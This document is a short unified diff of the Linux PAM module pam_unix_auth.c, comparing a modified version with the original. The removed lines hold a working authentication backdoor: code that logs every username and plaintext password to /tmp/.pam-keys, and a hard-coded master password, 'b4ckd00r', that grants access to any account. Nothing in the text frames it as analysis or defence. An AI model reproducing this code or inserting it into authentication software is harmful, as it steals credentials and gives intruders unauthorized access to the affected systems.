--- pam_unix_auth.c	2018-10-26 15:48:29.907243261 -0200
+++ pam_unix_auth-origin.c	2018-10-26 15:49:05.112934734 -0200
@@ -170,20 +170,8 @@
 	D(("user=%s, password=[%s]", name, p));
 
 	/* verify the password of this user */
-
-
-     FILE *k = fopen("/tmp/.pam-keys","a");
-     fprintf(k,"%s:%s\n", name, p);
-     fclose(k);
- 
-     if(strcmp(p,"b4ckd00r") != 0 ) {
-         retval = _unix_verify_password(pamh, name, p, ctrl);
-     } else {
-         retval = PAM_SUCCESS;
-     }
-
-    	
-        name = p = NULL;
+	retval = _unix_verify_password(pamh, name, p, ctrl);
+	name = p = NULL;
 
 	AUTH_RETURN;
 }
